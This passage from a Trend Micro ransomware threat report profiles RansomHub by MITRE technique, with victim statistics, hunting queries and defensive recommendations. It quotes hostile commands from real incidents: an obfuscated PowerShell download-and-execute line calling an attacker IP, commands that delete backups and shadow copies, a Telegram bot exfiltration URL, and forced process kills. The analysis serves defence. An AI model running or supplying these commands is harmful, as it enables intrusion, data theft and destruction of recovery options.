C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $F5='ject Net.WebCli';$F8='loadString(''hxxp://94[.]159[.]113[.]64/x.jpg'')';$F4='ent).Down';$F1='(New-Ob';$TC=IEX ($F1,$F5,$F4,$F8 -Join '')|IEX

The group used the robocopy command-line file transfer utility to copy files from a shared network location to a local directory.

The group also used the copy command-line file transfer utility to copy the archived ransomware payload from the network location to a local directory. It then unzips the password protected archive file using unzip.exe with the password D3f@ult.

T1219 - Remote Access Software
In the December 2024 instance of a RansomHub infection that involved XWORM, a rogue ScreenConnect/ConnectWise Remote Monitoring and Management (RMM) tool was seen connecting to a malicious URL (hxxp://web[.]opcortos[.]site/).

T1102.002 - Web Service: Bidirectional Communication
Once loaded in memory, XClientXB.b64 sends a message to a Telegram bot to send the gathered information.

Telegram Bot: hxxps[://]api[.]telegram[.]org/bot5867862670:AAHp7ECfsTluhMCJC4Vl2YYZCQDdUtQ-o18/sendMessage?chat_id=-4185548654&text={Gathered Information}

Information sent:
☠ [XWorm V5.2]
New Client: {Client ID}
UserName: {User Name}
OSFullName: {OS Version}
USB: {True or False}
CPU: {Processor Information}
GPU: {GPU Information}
RAM: {RAM}
Group: XWorm V5.2

T1071.001 - Application Layer Protocol: Web Protocols
The XWORM payload connects to 42[.]96[.]11[.]54:25209 and may have retrieved a plugin from the C&C server for encryption purposes.

T1531 - Account Access Removal
In an incident in January 2025 that we investigated, the threat group attempted to reset an account's password.

T1490 - Inhibit System Recovery
The file b.bat, detected as Trojan.BAT.ZEPPELIN.SMYXBEU.hp, was used to delete system backups and shadow copies:

wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
wbadmin DELETE BACKUP -keepVersions:0 wmic SHADOWCOPY DELETE
vssadmin Delete Shadows /All /Quiet bcdedit /set {default} recoveryenabled No bcdedit /set {default} bootstatuspolicy ignoreallfailures vssadmin list shadows

In the February 2025 incident that we investigated, a PowerShell script was executed to set a boot password in the system's BIOS/UEFI, enable BitLocker pre-boot authentication, and restart the system.

T1561.001 - Disk Wipe: Disk Content Wipe
In the February 2025 incident, a batch script named g.bat executed the command cipher /w:{drive} to securely overwrite the free space on the specified drive, rendering previously deleted files unrecoverable.

In the same incident, a PowerShell script named 111.ps1 was used to identify all non-system disks and securely wipe them using diskpart. It first lists the disks and asks for user confirmation before proceeding. Each selected disk is erased using the clean all command, ensuring complete data removal while preserving the system disk.

Another PowerShell script in the February 2025 incident was used. The script identifies all non-system disks and securely wipes them in parallel using diskpart. It first lists the disks and warns the user before proceeding. Each disk is erased using the clean all command inside background jobs, allowing multiple disks to be wiped simultaneously. Users can track progress with Get-Job and Wait-Job.

T1489 - Service Stop
The ransomware used tdsskiller.bat to execute the taskkill command toforce terminate processes and services.

taskkill /F /fi "IMAGENAME eq {*" /im *

T1486 - Data Encrypted for Impact
Based on external reports, the attacker sent a Microsoft Teams message from the compromised domain admin account, containing an Onion link for the ransom demand.

In the same report, it is mentioned that the group also used VeraCrypt, an open-source disk encryption tool, to encrypt local data backup server and Cohesity, an enterprise data backup and security solution to delete storage accounts.

T1529 - System Shutdown/Reboot
In one instance of a RansomHub infection last March 2025, a PowerShell command was executed to immediately restart the computer and forcibly close any running applications without warning.

cmd.exe /Q /c echo powershell.exe -noni -nop -w 1 -enc
IABTAGgAdQB0AGQAbwB3AG4AIAAtAHIAIAAtAHQAIAAwACAALQBmAA ^> {redacted} 2^>^&1 >
C:\WINDOWS\TEMP\vgFHtX.bat &
C:\WINDOWS\system32\cmd.exe /Q /c
C:\WINDOWS\TEMP\vgFHtX.bat &
C:\WINDOWS\system32\cmd.exe /Q /c del
C:\WINDOWS\TEMP\vgFHtX.bat

Summary of malware, tools, and exploits used

Table 1 summarizes the malware, techniques, and tools used for by RansomHub actors in their initial infection chain that we first observed.

Execution	Privilege Escalation	Credential Access	Lateral Movement	Discovery	Command and Control	Defense Evasion	Exfiltration	Impact
PsExec	CVE-2020-1472	MIMIKATZ LaZagne CVE-2023-27532 SecretServerSecretStealer Veeamp	SMB Spreader	NetScan Advanced Port Scanner	Atera Splashtop AnyDesk Ngrok Remmina ConnectWise Screen Connect	POORTRY  STONESTOP TOGGLEDEFENDER TDSSKiller EDR Kill Shifter IOBit Unlocker	RClone	RansomHub Ransomware

Table 1. Malware, techniques, and tools used in the RansomHub initial infection chain

Table 2 lists the malware and tools used in the RansomHub infection chains that uses NODESTEALER, XWORM, ad a modified Secure Common Uninstall Tool (SCUT).

Initial Access	Execution	Privilege Escalation	Credential Access	Discovery	Command and Control	Defense Evasion	Exfiltration	Impact
SocGholish	WinHelper.ps1 x.ps1 vcruntime.py	PowerRun	NODESTEALER	nbtscan	XWORM COBEACON Python SOCKS5 Proxy Client Betruger Configure-SMRemoting	Modified Secure Common Uninstall Tool (SCUT) AMSI Bypass Patcher Deployment Imaging Service and Management Tool (DISM) GMER Uninstall-CS-ISG.bat	MEGAsync	VeraCrypt

Table 2. Malware, techniques, and tools used in the RansomHub initial infections from November 2024 that used NODESTEALER, XWORM, ad a modified Secure Common Uninstall Tool (SCUT).

Top affected countries and industries from Trend Micro threat intelligence

In this section, we outline the activity of both the RansomHub ransomware and the Knight ransomware as investigations suggest that the two are related. RansomHub was first reported in February 2024, but the first instance of an attempted attack in Trend Micro-covered systems was in April 2024. The Knight ransomware, on the other hand, has been active since January this year, when we began to track it in our telemetry. While it has been previously mentioned that RansomHub was declared inactive since April after the DragonForce takeover, Trend telemetry counted detections until July, when our endpoint sensors identified detection names connected to RansomHub.

Figure 4. A monthly breakdown of attempted attacks from Knight ransomware and RansomHub ransomware (January 2024 to July 2025)

Knight ransomware’s top targeted countries include Brazil, Türkiye, the United States, Ireland, and Israel, while RansomHub focused their efforts in targeting enterprises from the United States and Malaysia. Note that the country data for RansomHub and Knight ransomware do not include October 2024 to February 2025 detections due to a retention limitation in our telemetry at the time of writing. Figure 3 will be updated once more data is available.

Figure 5. A breakdown of the top countries targeted by the Knight and RansomHub ransomware groups (January to September 2024, April to July 2025)

While many customers chose not to specify the industry in which they belong, data from those that did reveal that Knight ransomware targeted financial institutions the most, while RansomHub ransomware targeted the education sector the most. Note that the industry data for RansomHub and Knight ransomware do not include detections from October 2024 to February 2025 due to a retention limitation in our telemetry at the time of writing. Figure 3 will be updated once more data is available.

Figure 6. A breakdown of the top industries targeted by the Knight and RansomHub ransomware groups (January – September 2024, April to July 2025)

Targeted regions and industries according to RansomHub ransomware’s leak site

This section looks at data based on attacks recorded on the leak site of the RansomHub ransomware and a combination of our open-source intelligence (OSINT) research and an investigation from February 2024 to March 2025.

The gang has so far added at least 748 victims to its leak site, but the actual victim count is likely higher.

Of the total number of revealed victims, the RansomHub ransomware targeted enterprises in the North American region the most.  

Figure 7. The distribution by region of the RansomHub ransomware’s victim organizations, excluding victims with unknown locations
Sources: RansomHub ransomware’s leak site and Trend Micro’s OSINT research (February 2024 to March 2025)

RansomHub targeted enterprises in the United State the most. The gang launched attacks on other countries fewer times, but their total of 748 victims comes from a wide range of at least 75 countries.

Figure 8. The top 10 countries targeted by the RansomHub ransomware
Sources: RansomHub ransomware’s leak site and Trend Micro’s OSINT research (February 2024 to March 2025)

Majority of the RansomHub ransomware’s victim organizations were small businesses. The gang targeted medium businesses 65 times, and large enterprises only 38 times.

Figure 9. The distribution by organization size of INC’s victim organizations

Figure 9. The distribution by organization size of RansomHub’s victim organizations
Sources: RansomHub ransomware’s leak site and Trend Micro’s OSINT research (February 2024 to March 2025)

There are no outstanding sectors that RansomHub prefers to target, as their victimology by industry is spread out across sectors; however, the sector with the most attack counts as revealed by their leak site are from the IT sector.

Figure 10. A breakdown of the top 10 industries targeted by RansomHub ransomware attacks
Sources: RansomHub ransomware’s leak site and Trend Micro’s OSINT research (February 2024 to March 2025)

Trend Micro Vision One Threat Intelligence

To stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and better prepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and respond effectively to threats.

Trend Micro Vision One Intelligence Reports App [IOC Sweeping]

The following can be searched in the Trend Vision One Intelligence Reports dashboard for IOC sweeping:

RansomHub Attacks Surge: New Anti-EDR Tactics Unveiled and AMADEY Infrastracture Connection
[Hot Threats]: New Indicators for RANSOMHUB Ransomware -
New RansomHub attack uses TDSKiller and LaZagne, disables EDR
StopRansomware: RansomHub Ransomware

Trend Micro Vision One Threat Insights App

Threat Actors

Water Bakunawa

Emerging Threats

Trend Vision One Hunting Query

Trend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this feature with data in their environment.

RansomHub Ransomware VSAPI Detections and Ransom Note:

malName:(*RANSOMHUB* or *KNIGHT*) AND eventName: MALWARE_DETECTION AND FileFullPath:("*\\README_*")

RansomHub Ransomware Process Execution:

processCmd:"/*cmd.exe /c iisreset.exe /stop*/" AND processCmd:"*powershell.exe -Command PowerShell -Command "\"Get-CimInstance Win32_ShadowCopy | Remove-CimInstance\""*/" AND processCmd:"*powershell.exe -Command PowerShell -Command "\"Get-VM | Stop-VM -Force\""*/"

More hunting queries are available for Vision One customers with Threat Insights Entitlement enabled.

Recommendations

RansomHub ransomware is the latest evidence that cybercriminals are easy to respawn and work together with other groups to maximize profits from their extortion schemes. Its links to the people behind BlackCat and Knight ransomware make it a formidable threat worth watching out for, especially as the group’s victimology in less than a year of activity suggests frequent and aggressive attacks.

To protect systems against RansomHub ransomware and other similar threats, organizations can implement security frameworks that allocate resources systematically to establish a strong defense strategy.

The following are some best practices that organizations can consider to help protect themselves from ransomware infections:

Audit and inventory

Take an inventory of assets and data
Identify authorized and unauthorized devices and software
Make an audit of event and incident logs

Configure and monitor

Manage hardware and software configurations
Grant admin privileges and access only when necessary to an employee’s role
Monitor network ports, protocols, and services
Activate security configurations on network infrastructure devices such as firewalls and routers
Establish a software allow list that only executes legitimate applications

Patch and update

Conduct regular vulnerability assessments
Perform patching or virtual patching for operating systems and applications
Update software and applications to their latest versions

Protect and recover

Implement data protection, backup, and recovery measures
Enable multifactor authentication (MFA)

Secure and defend

Employ sandbox analysis to block malicious emails
Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and network
Detect early signs of an attack such as the presence of suspicious tools in the system
Use advanced detection technologies such as those powered by AI and machine learning

Train and test

Regularly train and assess employees on security skills
Conduct red-team exercises and penetration tests

A multilayered approach can help organizations guard the possible entry points into the system (endpoint, email, web, and network). Security solutions can detect malicious components and suspicious behavior could help protect enterprises.

- Trend Vision One™ – Endpoint Security provides multilayered prevention and protection capabilities across every stage of the attack chain. Industry-leading intrusion prevention empowers you to mitigate known but unpatched threats that can help block questionable behavior and tools early on before the ransomware can do irreversible damage to the system. Predict if files are malicious and detect indicators of attack before they get a chance to execute.
- Trend Vision One™ – Cloud Security provides advanced server security for physical, virtual, and cloud servers through file integrity monitoring, server intrusion prevention, and container security. It protects enterprise applications and data from breaches and business disruptions without requiring emergency patching.
- Trend Vision One™ – Email and Collaboration Security monitors employee risk levels in real-time with email user risk assessments, swiftly detects and responds to user-targeted threats, and implement email security and prevention measures to disrupt the attack chain and effectively mitigate risk.

HIDE

Like it? Add this infographic to your site:
1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V).

Image will appear the same size as you see above.

Posted in Ransomware Spotlight, Ransomware, Ransomware as a Service

Ransomware Spotlight: Ransomhub

What organizations need to know about RansomHub ransomware

Infection chain and techniques

Initial Access

Execution

Persistence

Defense Evasion

Credential Access

Discovery

Lateral Movement

Command and Control

Impact

Exfiltration

Initial Access

Execution

Privilege Escalation

Credential Access

Discovery

Command and Control

Defense Evasion

Exfiltration

Impact

MITRE tactics and techniques

Summary of malware, tools, and exploits used

Top affected countries and industries from Trend Micro threat intelligence

Targeted regions and industries according to RansomHub ransomware’s leak site

Trend Micro Vision One Threat Intelligence

Trend Micro Vision One Intelligence Reports App [IOC Sweeping]

Trend Micro Vision One Threat Insights App

Trend Vision One Hunting Query

Recommendations

Audit and inventory

Configure and monitor

Patch and update

Protect and recover

Secure and defend

Train and test

Related Posts

Recent Posts

We Recommend

Resources

Support

About Trend

Country Headquarters

The Americas

Middle East & Africa

Europe

Asia & Pacific